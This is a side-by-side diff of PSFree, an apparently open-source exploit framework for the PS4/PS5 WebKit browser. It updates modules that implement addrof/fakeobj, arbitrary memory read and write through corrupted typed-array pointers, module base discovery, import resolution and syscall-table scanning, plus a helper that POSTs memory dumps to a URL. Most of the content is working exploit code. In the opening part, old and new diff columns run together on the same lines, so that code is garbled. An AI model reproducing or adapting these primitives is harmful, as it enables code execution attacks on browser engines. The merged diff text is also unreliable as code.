const addr = this.add(offset); const m = mem;
return mem.read32(addr); if (isInteger(offset) && 0 <= offset && offset <= 0xffffffff) {
m._set_addr_direct(this);
} else {
add_and_set_addr(m, offset, this.lo, this.hi);
offset = 0;
}
return m.read32_at(offset);
} }
read64(offset) { read64(offset) {
const addr = this.add(offset); const m = mem;
return mem.read64(addr); if (isInteger(offset) && 0 <= offset && offset <= 0xffffffff) {
m._set_addr_direct(this);
} else {
add_and_set_addr(m, offset, this.lo, this.hi);
offset = 0;
}
return m.read64_at(offset);
} }
// returns a pointer instead of an Int
readp(offset) { readp(offset) {
const addr = this.add(offset); const m = mem;
return mem.readp(addr); if (isInteger(offset) && 0 <= offset && offset <= 0xffffffff) {
m._set_addr_direct(this);
} else {
add_and_set_addr(m, offset, this.lo, this.hi);
offset = 0;
}
return m.readp_at(offset);
} }
write8(offset, value) { write8(offset, value) {
const addr = this.add(offset); const m = mem;
if (isInteger(offset) && 0 <= offset && offset <= 0xffffffff) {
m._set_addr_direct(this);
} else {
add_and_set_addr(m, offset, this.lo, this.hi);
offset = 0;
}
mem.write8(addr, value); m.write8_at(offset, value);
} }
write16(offset, value) { write16(offset, value) {
const addr = this.add(offset); const m = mem;
if (isInteger(offset) && 0 <= offset && offset <= 0xffffffff) {
m._set_addr_direct(this);
} else {
add_and_set_addr(m, offset, this.lo, this.hi);
offset = 0;
}
mem.write16(addr, value); m.write16_at(offset, value);
} }
write32(offset, value) { write32(offset, value) {
const addr = this.add(offset); const m = mem;
if (isInteger(offset) && 0 <= offset && offset <= 0xffffffff) {
m._set_addr_direct(this);
} else {
add_and_set_addr(m, offset, this.lo, this.hi);
offset = 0;
}
mem.write32(addr, value); m.write32_at(offset, value);
} }
write64(offset, value) { write64(offset, value) {
const addr = this.add(offset); const m = mem;
if (isInteger(offset) && 0 <= offset && offset <= 0xffffffff) {
m._set_addr_direct(this);
} else {
add_and_set_addr(m, offset, this.lo, this.hi);
offset = 0;
}
mem.write64(addr, value); m.write64_at(offset, value);
} }
} }
class MemoryBase { // expected:
_addrof(obj) { // * main - Uint32Array whose m_vector points to worker
if (typeof obj !== 'object' // * worker - DataView
&& typeof obj !== 'function' //
) { // addrof()/fakeobj() expectations:
throw TypeError('addrof argument not a JS object'); // * obj - has a "addr" property and a 0 index.
// * addr_addr - Int, the address of the slot of obj.addr
// * fake_addr - Int, the address of the slot of obj[0]
//
// a valid example for "obj" is "{addr: null, 0: 0}". note that this example
// has [0] be 0 so that the butterfly's indexing type is ArrayWithInt32. this
// prevents the garbage collector from incorrectly treating the slot's value as
// a JSObject and then crash
//
// the relative read/write methods expect the offset to be a unsigned 32-bit
// integer
export class Memory {
constructor(main, worker, obj, addr_addr, fake_addr) {
this._main = main;
this._worker = worker;
this._obj = obj;
this._addr_low = addr_addr.lo;
this._addr_high = addr_addr.hi;
this._fake_low = fake_addr.lo;
this._fake_high = fake_addr.hi;
main[view_m_length / 4] = 0xffffffff;
init_module(this);
const off_mvec = view_m_vector;
// use this to create WastefulTypedArrays to avoid a GC crash
const buf = new ArrayBuffer(0);
const src = new Uint8Array(buf);
const sset = new Uint32Array(buf);
const sset_p = this.addrof(sset);
sset_p.write64(off_mvec, this.addrof(src).add(off_mvec));
sset_p.write32(view_m_length, 3);
this._cpysrc = src;
this._src_setter = sset;
const dst = new Uint8Array(buf);
const dset = new Uint32Array(buf);
const dset_p = this.addrof(dset);
dset_p.write64(off_mvec, this.addrof(dst).add(off_mvec));
dset_p.write32(view_m_length, 3);
dset[2] = 0xffffffff;
this._cpydst = dst;
this._dst_setter = dset;
}
// dst and src may overlap
cpy(dst, src, len) {
if (!(isInteger(len) && 0 <= len && len <= 0xffffffff)) {
throw TypeError('len not a unsigned 32-bit integer');
} }
this.worker.a = obj;
write64(this.main, o.view_m_vector, this.butterfly.sub(0x10)); const dvals = lohi_from_one(dst);
let res = read64(this.worker, 0); const svals = lohi_from_one(src);
write64(this.main, o.view_m_vector, this._current_addr); const dset = this._dst_setter;
const sset = this._src_setter;
dset[0] = dvals[0];
dset[1] = dvals[1];
sset[0] = svals[0];
sset[1] = svals[1];
sset[2] = len;
this._cpydst.set(this._cpysrc);
}
// allocate Garbage Collector managed memory. returns [address_of_memory,
// backer]. backer is the JSCell that is keeping the returned memory alive,
// you can drop it once you have another GC object reference the address.
// the backer is an implementation detail. don't use it to mutate the
// memory
gc_alloc(size) {
if (!isInteger(size)) {
throw TypeError('size not a integer');
}
if (size < 0) {
throw RangeError('size is negative');
}
const fastLimit = 1000;
size = (size + 7 & ~7) >> 3;
if (size > fastLimit) {
throw RangeError('size is too large');
}
const backer = new Float64Array(size);
return [mem.addrof(backer).readp(view_m_vector), backer];
}
fakeobj(addr) {
const values = lohi_from_one(addr);
const worker = this._worker;
const main = this._main;
main[off_vector] = this._fake_low;
main[off_vector2] = this._fake_high;
worker.setUint32(0, values[0], true);
worker.setUint32(4, values[1], true);
return this._obj[0];
}
addrof(object) {
// typeof considers null as a object. blacklist it as it isn't a
// JSObject
if (object === null
|| (typeof object !== 'object' && typeof object !== 'function')
) {
throw TypeError('argument not a JS object');
}
const obj = this._obj;
const worker = this._worker;
const main = this._main;
obj.addr = object;
main[off_vector] = this._addr_low;
main[off_vector2] = this._addr_high;
const res = new Addr(
worker.getUint32(0, true),
worker.getUint32(4, true),
);
obj.addr = null;
return res; return res;
} }
addrof(obj) { // expects addr to be a Int
return new Addr(this._addrof(obj)); _set_addr_direct(addr) {
const main = this._main;
main[off_vector] = addr.lo;
main[off_vector2] = addr.hi;
} }
set_addr(addr) { set_addr(addr) {
if (!(addr instanceof Int)) { const values = lohi_from_one(addr);
throw TypeError('addr must be an Int'); const main = this._main;
} main[off_vector] = values[0];
this._current_addr = addr; main[off_vector2] = values[1];
write64(this.main, o.view_m_vector, this._current_addr);
} }
get_addr() { get_addr() {
return this._current_addr; const main = this._main;
} return new Addr(main[off_vector], main[off_vector2]);
// write0() is for when you want to write to address 0. You can't use for
// example: "mem.write32(Int.Zero, 0)", since you can't set by index the
// view when it isDetached(). isDetached() == true when m_mode >=
// WastefulTypedArray and m_vector == 0.
//
// Functions like write32() will index mem.worker via write() from rw.mjs.
//
// size is the number of bits to read/write.
//
// The constraint is 0 <= offset + 1 < 2**32.
//
// PS4 firmwares >= 9.00 and any PS5 version can write to address 0
// directly. All firmwares (PS4 and PS5) can read address 0 directly.
//
// See setIndex() from
// WebKit/Source/JavaScriptCore/runtime/JSGenericTypedArrayView.h at PS4
// 8.03 for more information. Affected firmwares will get this error:
//
// TypeError: Underlying ArrayBuffer has been detached from the view
write0(size, offset, value) {
const i = offset + 1;
if (i >= 2**32 || i < 0) {
throw RangeError(`read0() invalid offset: ${offset}`);
}
this.set_addr(new Int(-1));
switch (size) {
case 8: {
this.worker[i] = value;
}
case 16: {
write16(this.worker, i, value);
}
case 32: {
write32(this.worker, i, value);
}
case 64: {
write64(this.worker, i, value);
}
default: {
throw RangeError(`write0() invalid size: ${size}`);
}
}
} }
read8(addr) { read8(addr) {
this.set_addr(addr); this.set_addr(addr);
return this.worker[0]; return this._worker.getUint8(0);
} }
read16(addr) { read16(addr) {
this.set_addr(addr); this.set_addr(addr);
return read16(this.worker, 0); return this._worker.getUint16(0, true);
} }
read32(addr) { read32(addr) {
this.set_addr(addr); this.set_addr(addr);
return read32(this.worker, 0); return this._worker.getUint32(0, true);
} }
read64(addr) { read64(addr) {
this.set_addr(addr); this.set_addr(addr);
return read64(this.worker, 0); const worker = this._worker;
return new Int(worker.getUint32(0, true), worker.getUint32(4, true));
} }
// returns a pointer instead of an Int // returns a pointer instead of an Int
readp(addr) { readp(addr) {
return new Addr(this.read64(addr)); this.set_addr(addr);
const worker = this._worker;
return new Addr(worker.getUint32(0, true), worker.getUint32(4, true));
}
read8_at(offset) {
if (!isInteger(offset)) {
throw TypeError('offset not a integer');
}
return this._worker.getUint8(offset);
}
read16_at(offset) {
if (!isInteger(offset)) {
throw TypeError('offset not a integer');
}
return this._worker.getUint16(offset, true);
}
read32_at(offset) {
if (!isInteger(offset)) {
throw TypeError('offset not a integer');
}
return this._worker.getUint32(offset, true);
}
read64_at(offset) {
if (!isInteger(offset)) {
throw TypeError('offset not a integer');
}
const worker = this._worker;
return new Int(
worker.getUint32(offset, true),
worker.getUint32(offset + 4, true),
);
}
readp_at(offset) {
if (!isInteger(offset)) {
throw TypeError('offset not a integer');
}
const worker = this._worker;
return new Addr(
worker.getUint32(offset, true),
worker.getUint32(offset + 4, true),
);
} }
write8(addr, value) { write8(addr, value) {
this.set_addr(addr); this.set_addr(addr);
this.worker[0] = value; this._worker.setUint8(0, value);
} }
write16(addr, value) { write16(addr, value) {
this.set_addr(addr); this.set_addr(addr);
write16(this.worker, 0, value); this._worker.setUint16(0, value, true);
} }
write32(addr, value) { write32(addr, value) {
this.set_addr(addr); this.set_addr(addr);
write32(this.worker, 0, value); this._worker.setUint32(0, value, true);
} }
write64(addr, value) { write64(addr, value) {
const values = lohi_from_one(value);
this.set_addr(addr); this.set_addr(addr);
write64(this.worker, 0, value); const worker = this._worker;
} worker.setUint32(0, values[0], true);
} worker.setUint32(4, values[1], true);
}
export class Memory extends MemoryBase {
constructor(main, worker) { write8_at(offset, value) {
super(); if (!isInteger(offset)) {
throw TypeError('offset not a integer');
this.main = main; }
this.worker = worker; this._worker.setUint8(offset, value);
}
// The initial creation of the "a" property will change the butterfly
// address. Do it now so we can cache it for addrof(). write16_at(offset, value) {
worker.a = 0; // dummy value, we just want to create the "a" property if (!isInteger(offset)) {
this.butterfly = read64(main, o.js_butterfly); throw TypeError('offset not a integer');
}
write32(main, o.view_m_length, 0xffffffff); this._worker.setUint16(offset, value, true);
}
this._current_addr = Int.Zero;
write32_at(offset, value) {
init_module(this); if (!isInteger(offset)) {
throw TypeError('offset not a integer');
}
this._worker.setUint32(offset, value, true);
}
write64_at(offset, value) {
if (!isInteger(offset)) {
throw TypeError('offset not a integer');
}
const values = lohi_from_one(value);
const worker = this._worker;
worker.setUint32(offset, values[0], true);
worker.setUint32(offset + 4, values[1], true);
} }
} }
module/memtools.mjs
+40 -29
View File
@@ -1,4 +1,4 @@
/* Copyright (C) 2023-2024 anonymous /* Copyright (C) 2023-2025 anonymous
This file is part of PSFree. This file is part of PSFree.
@@ -18,13 +18,13 @@ along with this program. If not, see <https://www.gnu.org/licenses/>. */
// This module are for utilities that depend on running the exploit first // This module are for utilities that depend on running the exploit first
import { Int } from './int64.mjs'; import { Int } from './int64.mjs';
import { Addr, mem } from './mem.mjs'; import { mem } from './mem.mjs';
import { align } from './utils.mjs'; import { align } from './utils.mjs';
import { KB } from './constants.mjs'; import { page_size } from './offset.mjs';
import { read32 } from './rw.mjs'; import { BufferView } from './rw.mjs';
import { View1 } from './view.mjs';
import * as rw from './rw.mjs'; import * as off from './offset.mjs';
import * as o from './offset.mjs';
// creates an ArrayBuffer whose contents is copied from addr // creates an ArrayBuffer whose contents is copied from addr
export function make_buffer(addr, size) { export function make_buffer(addr, size) {
@@ -53,11 +53,11 @@ export function make_buffer(addr, size) {
const u_addr = mem.addrof(u); const u_addr = mem.addrof(u);
// we won't change the butterfly and m_mode so we won't save those // we won't change the butterfly and m_mode so we won't save those
const old_addr = u_addr.read64(o.view_m_vector); const old_addr = u_addr.read64(off.view_m_vector);
const old_size = u_addr.read32(o.view_m_length); const old_size = u_addr.read32(off.view_m_length);
u_addr.write64(o.view_m_vector, addr); u_addr.write64(off.view_m_vector, addr);
u_addr.write32(o.view_m_length, size); u_addr.write32(off.view_m_length, size);
const copy = new Uint8Array(u.length); const copy = new Uint8Array(u.length);
copy.set(u); copy.set(u);
@@ -76,8 +76,8 @@ export function make_buffer(addr, size) {
const res = copy.buffer; const res = copy.buffer;
// restore // restore
u_addr.write64(o.view_m_vector, old_addr); u_addr.write64(off.view_m_vector, old_addr);
u_addr.write32(o.view_m_length, old_size); u_addr.write32(off.view_m_length, old_size);
return res; return res;
} }
@@ -87,8 +87,8 @@ function check_magic_at(p, is_text) {
// byte sequence that is very likely to appear at offset 0 of a .text // byte sequence that is very likely to appear at offset 0 of a .text
// segment // segment
const text_magic = [ const text_magic = [
new Int([0x55, 0x48, 0x89, 0xe5, 0x41, 0x57, 0x41, 0x56]), new Int(0xe5894855, 0x56415741),
new Int([0x41, 0x55, 0x41, 0x54, 0x53, 0x50, 0x48, 0x8d]), new Int(0x54415541, 0x8d485053),
]; ];
// the .data "magic" is just a portion of the PT_SCE_MODULE_PARAM segment // the .data "magic" is just a portion of the PT_SCE_MODULE_PARAM segment
@@ -137,8 +137,6 @@ function check_magic_at(p, is_text) {
// addr.read8(-1); // addr.read8(-1);
// //
export function find_base(addr, is_text, is_back) { export function find_base(addr, is_text, is_back) {
// ps4 page size
const page_size = 16 * KB;
// align to page size // align to page size
addr = align(addr, page_size); addr = align(addr, page_size);
const offset = (is_back ? -1 : 1) * page_size; const offset = (is_back ? -1 : 1) * page_size;
@@ -146,7 +144,7 @@ export function find_base(addr, is_text, is_back) {
if (check_magic_at(addr, is_text)) { if (check_magic_at(addr, is_text)) {
break; break;
} }
addr = addr.add(offset) addr = addr.add(offset);
} }
return addr; return addr;
} }
@@ -156,27 +154,27 @@ export function get_view_vector(view) {
if (!ArrayBuffer.isView(view)) { if (!ArrayBuffer.isView(view)) {
throw TypeError(`object not a JSC::JSArrayBufferView: ${view}`); throw TypeError(`object not a JSC::JSArrayBufferView: ${view}`);
} }
return mem.addrof(view).readp(o.view_m_vector); return mem.addrof(view).readp(off.view_m_vector);
} }
export function resolve_import(import_addr) { export function resolve_import(import_addr) {
if (import_addr.read16(0) !== 0x25ff) { if (import_addr.read16(0) !== 0x25ff) {
throw Error( throw Error(
`instruction at ${import_addr} is not of the form: jmp qword` `instruction at ${import_addr} is not of the form: jmp qword`
+ ' [rip + X]' + ' [rip + X]');
);
} }
// module_function_import: // module_function_import:
// jmp qword [rip + X] // jmp qword [rip + X]
// ff 25 xx xx xx xx // signed 32-bit displacement // ff 25 xx xx xx xx // signed 32-bit displacement
const disp = import_addr.read32(2); const disp = import_addr.read32(2);
// sign extend // assume disp and offset are 32-bit integers
const offset = new Int(disp, disp >> 31); // x | 0 will always be a signed integer
const offset = (disp | 0) + 6;
// The rIP value used by "jmp [rip + X]" instructions is actually the rIP // The rIP value used by "jmp [rip + X]" instructions is actually the rIP
// of the next instruction. This means that the actual address used is // of the next instruction. This means that the actual address used is
// [rip + X + sizeof(jmp_insn)], where sizeof(jmp_insn) is the size of the // [rip + X + sizeof(jmp_insn)], where sizeof(jmp_insn) is the size of the
// jump instruction, which is 6 in this case. // jump instruction, which is 6 in this case.
const function_addr = import_addr.readp(offset.add(6)); const function_addr = import_addr.readp(offset);
return function_addr; return function_addr;
} }
@@ -186,8 +184,9 @@ export function init_syscall_array(
libkernel_web_base, libkernel_web_base,
max_search_size, max_search_size,
) { ) {
if (typeof max_search_size !== 'number') { if (!Number.isInteger(max_search_size)) {
throw TypeError(`max_search_size is not a number: ${max_search_size}`); throw TypeError(
`max_search_size is not a integer: ${max_search_size}`);
} }
if (max_search_size < 0) { if (max_search_size < 0) {
throw Error(`max_search_size is less than 0: ${max_search_size}`); throw Error(`max_search_size is less than 0: ${max_search_size}`);
@@ -197,7 +196,7 @@ export function init_syscall_array(
libkernel_web_base, libkernel_web_base,
max_search_size, max_search_size,
); );
const kbuf = new Uint8Array(libkernel_web_buffer); const kbuf = new BufferView(libkernel_web_buffer);
// Search 'rdlo' string from libkernel_web's .rodata section to gain an // Search 'rdlo' string from libkernel_web's .rodata section to gain an
// upper bound on the size of the .text section. // upper bound on the size of the .text section.
@@ -217,8 +216,7 @@ export function init_syscall_array(
if (!found) { if (!found) {
throw Error( throw Error(
'"rdlo" string not found in libkernel_web, base address:' '"rdlo" string not found in libkernel_web, base address:'
+ ` ${libkernel_web_base}` + ` ${libkernel_web_base}`);
);
} }
// search for the instruction sequence: // search for the instruction sequence:
@@ -236,10 +234,23 @@ export function init_syscall_array(
&& kbuf[i + 10] === 0x0f && kbuf[i + 10] === 0x0f
&& kbuf[i + 11] === 0x05 && kbuf[i + 11] === 0x05
) { ) {
const syscall_num = read32(kbuf, i + 3); const syscall_num = kbuf.read32(i + 3);
syscall_array[syscall_num] = libkernel_web_base.add(i); syscall_array[syscall_num] = libkernel_web_base.add(i);
// skip the sequence // skip the sequence
i += 11; i += 11;
} }
} }
} }
// create a char array like in the C language
//
// string to view since it's easier to get the address of the buffer this way
export function cstr(str) {
str += '\0';
return View1.from(str, c => c.codePointAt(0));
}
// we are re-exporting this since users that want to use cstr() usually want
// jstr() as well. they are likely working with functions that take/return
// strings
export { jstr } from './utils.mjs';
module/offset.mjs
+28 -1
View File
@@ -1,4 +1,4 @@
/* Copyright (C) 2023 anonymous /* Copyright (C) 2023-2025 anonymous
This file is part of PSFree. This file is part of PSFree.
@@ -15,8 +15,16 @@ GNU Affero General Public License for more details.
You should have received a copy of the GNU Affero General Public License You should have received a copy of the GNU Affero General Public License
along with this program. If not, see <https://www.gnu.org/licenses/>. */ along with this program. If not, see <https://www.gnu.org/licenses/>. */
// WebKit offsets start
// offsets for JSC::JSObject // offsets for JSC::JSObject
export const js_cell = 0;
export const js_butterfly = 0x8; export const js_butterfly = 0x8;
// start of the array of inline properties (JSValues)
export const js_inline_prop = 0x10;
// sizeof JSC::JSObject
export const size_jsobj = js_inline_prop;
// offsets for JSC::JSArrayBufferView // offsets for JSC::JSArrayBufferView
export const view_m_vector = 0x10; export const view_m_vector = 0x10;
@@ -33,3 +41,22 @@ export const strimpl_inline_str = 0x14;
// sizeof WTF::StringImpl // sizeof WTF::StringImpl
export const size_strimpl = 0x18; export const size_strimpl = 0x18;
// offsets for WebCore::JSHTMLTextAreaElement, subclass of JSObject
// offset to m_wrapped, pointer to a DOM object
// for this class, it's a WebCore::HTMLTextAreaElement pointer
export const jsta_impl = 0x18;
// sizeof WebCore::JSHTMLTextAreaElement
export const size_jsta = 0x20;
// WebKit offsets end
export const KB = 1024;
export const MB = KB * KB;
export const GB = KB * KB * KB;
export const page_size = 16 * KB; // page size on the ps4
// size of the buffer used by setcontext/getcontext (see module/chain.mjs)
export const context_size = 0xc8;
module/rw.mjs
+52 -17
View File
@@ -1,4 +1,4 @@
/* Copyright (C) 2023 anonymous /* Copyright (C) 2023-2025 anonymous
This file is part of PSFree. This file is part of PSFree.
@@ -15,7 +15,54 @@ GNU Affero General Public License for more details.
You should have received a copy of the GNU Affero General Public License You should have received a copy of the GNU Affero General Public License
along with this program. If not, see <https://www.gnu.org/licenses/>. */ along with this program. If not, see <https://www.gnu.org/licenses/>. */
import { Int } from './int64.mjs'; import { Int, lohi_from_one } from './int64.mjs';
// DataView's accessors are constant time and are faster when doing multi-byte
// accesses but the single-byte accessors are slightly slower compared to just
// indexing the Uint8Array
//
// to get the best of both worlds, BufferView uses a DataView for multi-byte
// accesses and a Uint8Array for single-byte
//
// instances of BufferView will their have m_mode set to WastefulTypedArray
// since we use the .buffer getter to create a DataView
export class BufferView extends Uint8Array {
constructor(...args) {
super(...args);
this._dview = new DataView(this.buffer, this.byteOffset);
}
read16(offset) {
return this._dview.getUint16(offset, true);
}
read32(offset) {
return this._dview.getUint32(offset, true);
}
read64(offset) {
return new Int(
this._dview.getUint32(offset, true),
this._dview.getUint32(offset + 4, true),
);
}
write16(offset, value) {
this._dview.setUint16(offset, value, true);
}
write32(offset, value) {
this._dview.setUint32(offset, value, true);
}
write64(offset, value) {
const values = lohi_from_one(value);
this._dview.setUint32(offset, values[0], true);
this._dview.setUint32(offset + 4, values[1], true);
}
}
// WARNING: These functions are now deprecated. use BufferView instead.
// view.buffer is the underlying ArrayBuffer of a TypedArray, but since we will // view.buffer is the underlying ArrayBuffer of a TypedArray, but since we will
// be corrupting the m_vector of our target views later, the ArrayBuffer's // be corrupting the m_vector of our target views later, the ArrayBuffer's
@@ -58,11 +105,7 @@ export function read32(u8_view, offset) {
} }
export function read64(u8_view, offset) { export function read64(u8_view, offset) {
let res = []; return new Int(read32(u8_view, offset), read32(u8_view, offset + 4));
for (let i = 0; i < 8; i++) {
res.push(u8_view[offset + i]);
}
return new Int(res);
} }
// for writes less than 8 bytes // for writes less than 8 bytes
@@ -85,8 +128,8 @@ export function write64(u8_view, offset, value) {
throw TypeError('write64 value must be an Int'); throw TypeError('write64 value must be an Int');
} }
let low = value.low(); let low = value.lo;
let high = value.high(); let high = value.hi;
for (let i = 0; i < 4; i++) { for (let i = 0; i < 4; i++) {
u8_view[offset + i] = (low >>> i*8) & 0xff; u8_view[offset + i] = (low >>> i*8) & 0xff;
@@ -95,11 +138,3 @@ export function write64(u8_view, offset, value) {
u8_view[offset + 4 + i] = (high >>> i*8) & 0xff; u8_view[offset + 4 + i] = (high >>> i*8) & 0xff;
} }
} }
export function sread64(str, offset) {
let res = [];
for (let i = 0; i < 8; i++) {
res.push(str.charCodeAt(offset + i));
}
return new Int(res);
}
module/utils.mjs
+121 -24
View File
@@ -1,4 +1,4 @@
/* Copyright (C) 2023 anonymous /* Copyright (C) 2023-2025 anonymous
This file is part of PSFree. This file is part of PSFree.
@@ -17,32 +17,24 @@ along with this program. If not, see <https://www.gnu.org/licenses/>. */
import { Int } from './int64.mjs'; import { Int } from './int64.mjs';
export function die(msg) { export class DieError extends Error {
alert(msg); constructor(...args) {
undefinedFunction(); super(...args);
this.name = this.constructor.name;
}
} }
export function debug_log(msg) { export function die(msg='') {
let textNode = document.createTextNode(msg); throw new DieError(msg);
let node = document.createElement("p").appendChild(textNode); }
document.body.appendChild(node); const console = document.getElementById('console');
document.body.appendChild(document.createElement("br")); export function log(msg='') {
console.append(msg + '\n');
} }
export function clear_log() { export function clear_log() {
document.body.innerHTML = null; console.innerHTML = null;
}
export function str2array(str, length, offset) {
if (offset === undefined) {
offset = 0;
}
let a = new Array(length);
for (let i = 0; i < length; i++) {
a[i] = str.charCodeAt(i + offset);
}
return a;
} }
// alignment must be 32 bits and is a power of 2 // alignment must be 32 bits and is a power of 2
@@ -52,8 +44,8 @@ export function align(a, alignment) {
} }
const mask = -alignment & 0xffffffff; const mask = -alignment & 0xffffffff;
let type = a.constructor; let type = a.constructor;
let low = a.low() & mask; let low = a.lo & mask;
return new type(low, a.high()); return new type(low, a.hi);
} }
export async function send(url, buffer, file_name, onload=() => {}) { export async function send(url, buffer, file_name, onload=() => {}) {
@@ -65,7 +57,7 @@ export async function send(url, buffer, file_name, onload=() => {}) {
const form = new FormData(); const form = new FormData();
form.append('upload', file); form.append('upload', file);
debug_log('send'); log('send');
const response = await fetch(url, {method: 'POST', body: form}); const response = await fetch(url, {method: 'POST', body: form});
if (!response.ok) { if (!response.ok) {
@@ -73,3 +65,108 @@ export async function send(url, buffer, file_name, onload=() => {}) {
} }
onload(); onload();
} }
// mostly used to yield to the GC. marking is concurrent but collection isn't
//
// yielding also lets the DOM update. which is useful since we use the DOM for
// logging and we loop when waiting for a collection to occur
export function sleep(ms=0) {
return new Promise(resolve => setTimeout(resolve, ms));
}
export function hex(number) {
return '0x' + number.toString(16);
}
// no "0x" prefix
export function hex_np(number) {
return number.toString(16);
}
// expects a byte array
export function hexdump(view) {
const num_16 = view.length & ~15;
const residue = view.length - num_16;
const max_off_len = hex_np(((view.length + 7) & ~7) - 1).length;
function chr(i) {
if (0x20 <= i && i <= 0x7e) {
return String.fromCodePoint(i);
}
return '.';
}
function to_hex(view, offset, length) {
return (
[...view.slice(offset, offset + length)]
.map(e => hex_np(e).padStart(2, '0'))
.join(' ')
);
}
let bytes = [];
for (let i = 0; i < num_16; i += 16) {
const long1 = to_hex(view, i, 8);
const long2 = to_hex(view, i + 8, 8);
let print = '';
for (let j = 0; j < 16; j++) {
print += chr(view[j]);
}
bytes.push([`${long1} ${long2}`, print]);
}
if (residue) {
const small = residue <= 8;
const long1_len = small ? residue : 8;
let long1 = to_hex(view, num_16, long1_len);
if (small) {
for (let i = 0; i < 8 - residue; i++) {
long1 += ' xx';
}
}
const long2 = (() => {
if (small) {
return Array(8).fill('xx').join(' ');
}
let res = to_hex(view, num_16 + 8, residue - 8);
for (let i = 0; i < 16 - residue; i++) {
res += ' xx';
}
return res;
})();
let print = '';
for (let i = 0; i < residue; i++) {
print += chr(view[num_16 + i]);
}
for (let i = 0; i < 16 - residue; i++) {
print += ' ';
}
bytes.push([`${long1} ${long2}`, print]);
}
for (const [pos, [val, print]] of bytes.entries()) {
const off = hex_np(pos * 16).padStart(max_off_len, '0');
log(`${off} | ${val} |${print}|`);
}
}
// make a JavaScript string
export function jstr(buffer) {
let res = '';
for (const item of buffer) {
if (item === 0) {
break;
}
res += String.fromCodePoint(item);
}
// convert to primitive string
return String(res);
}
module/view.mjs
+261
View File
@@ -0,0 +1,261 @@
/* Copyright (C) 2025 anonymous
This file is part of PSFree.
PSFree is free software: you can redistribute it and/or modify
it under the terms of the GNU Affero General Public License as
published by the Free Software Foundation, either version 3 of the
License, or (at your option) any later version.
PSFree is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU Affero General Public License for more details.
You should have received a copy of the GNU Affero General Public License
along with this program. If not, see <https://www.gnu.org/licenses/>. */
import { Int, lohi_from_one } from '/module/int64.mjs';
import { Addr } from '/module/mem.mjs';
import { BufferView } from '/module/rw.mjs';
import * as config from '/config.mjs';
import * as mt from '/module/memtools.mjs';
// View constructors will always get the buffer property in order to make sure
// that the JSArrayBufferView is a WastefulTypedArray. m_vector may change if
// m_mode < WastefulTypedArray. This is to make caching the m_view field
// possible. Users don't have to worry if the m_view they got from addr() is
// possibly stale.
//
// see possiblySharedBuffer() from
// WebKit/Source/JavaScriptCore/runtime/JSArrayBufferViewInlines.h
// at PS4 8.03
//
// Subclasses of TypedArray are still implemented as a JSArrayBufferView, so
// get_view_vector() still works on them.
function ViewMixin(superclass) {
const res = class extends superclass {
constructor(...args) {
super(...args);
this.buffer;
}
get addr() {
let res = this._addr_cache;
if (res !== undefined) {
return res;
}
res = mt.get_view_vector(this);
this._addr_cache = res;
return res;
}
get size() {
return this.byteLength;
}
addr_at(index) {
const size = this.BYTES_PER_ELEMENT;
return this.addr.add(index * size);
}
sget(index) {
return this[index] | 0;
}
};
// workaround for known affected versions: ps4 [6.00, 10.00)
//
// see from() and of() from
// WebKit/Source/JavaScriptCore/builtins/TypedArrayConstructor.js at PS4
// 8.0x
//
// @getByIdDirectPrivate(this, "allocateTypedArray") will fail when "this"
// isn't one of the built-in TypedArrays. this is a violation of the
// ECMAScript spec at that time
//
// TODO assumes ps4, support ps5 as well
// FIXME define the from/of workaround functions once
if (0x600 <= config.target && config.target < 0x1000) {
res.from = function from(...args) {
const base = this.__proto__;
return new this(base.from(...args).buffer);
};
res.of = function of(...args) {
const base = this.__proto__;
return new this(base.of(...args).buffer);
};
}
return res;
}
export class View1 extends ViewMixin(Uint8Array) {}
export class View2 extends ViewMixin(Uint16Array) {}
export class View4 extends ViewMixin(Uint32Array) {}
export class Buffer extends BufferView {
get addr() {
let res = this._addr_cache;
if (res !== undefined) {
return res;
}
res = mt.get_view_vector(this);
this._addr_cache = res;
return res;
}
get size() {
return this.byteLength;
}
addr_at(index) {
return this.addr.add(index);
}
}
// see from() and of() comment above
if (0x600 <= config.target && config.target < 0x1000) {
Buffer.from = function from(...args) {
const base = this.__proto__;
return new this(base.from(...args).buffer);
};
Buffer.of = function of(...args) {
const base = this.__proto__;
return new this(base.of(...args).buffer);
};
}
const VariableMixin = superclass => class extends superclass {
constructor(value=0) {
// unlike the View classes, we don't allow number coercion. we
// explicitly allow floats unlike Int
if (typeof value !== 'number') {
throw TypeError('value not a number');
}
super([value]);
}
addr_at(...args) {
throw TypeError('unimplemented method');
}
[Symbol.toPrimitive](hint) {
return this[0];
}
toString(...args) {
return this[0].toString(...args);
}
};
export class Byte extends VariableMixin(View1) {}
export class Short extends VariableMixin(View2) {}
// Int was already taken by int64.mjs
export class Word extends VariableMixin(View4) {}
export class LongArray {
constructor(length) {
this.buffer = new DataView(new ArrayBuffer(length * 8));
}
get addr() {
return mt.get_view_vector(this.buffer);
}
addr_at(index) {
return this.addr.add(index * 8);
}
get length() {
return this.buffer.length / 8;
}
get size() {
return this.buffer.byteLength;
}
get byteLength() {
return this.size;
}
get(index) {
const buffer = this.buffer;
const base = index * 8;
return new Int(
buffer.getUint32(base, true),
buffer.getUint32(base + 4, true),
);
}
set(index, value) {
const buffer = this.buffer;
const base = index * 8;
const values = lohi_from_one(value);
buffer.setUint32(base, values[0], true);
buffer.setUint32(base + 4, values[1], true);
}
}
// mutable Int (we are explicitly using Int's private fields)
const Word64Mixin = superclass => class extends superclass {
constructor(...args) {
if (!args.length) {
return super(0);
}
super(...args);
}
get addr() {
// assume this is safe to cache
return mt.get_view_vector(this._u32);
}
get length() {
return 1;
}
get size() {
return 8;
}
get byteLength() {
return 8;
}
// no setters for top and bot since low/high can accept negative integers
get lo() {
return super.lo;
}
set lo(value) {
this._u32[0] = value;
}
get hi() {
return super.hi;
}
set hi(value) {
this._u32[1] = value;
}
set(value) {
const buffer = this._u32;
const values = lohi_from_one(value);
buffer[0] = values[0];
buffer[1] = values[1];
}
};
export class Long extends Word64Mixin(Int) {
as_addr() {
return new Addr(this);
}
}
export class Pointer extends Word64Mixin(Addr) {}
psfree.mjs
+863
View File
@@ -0,0 +1,863 @@
/* Copyright (C) 2023-2025 anonymous
This file is part of PSFree.
PSFree is free software: you can redistribute it and/or modify
it under the terms of the GNU Affero General Public License as
published by the Free Software Foundation, either version 3 of the
License, or (at your option) any later version.
PSFree is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
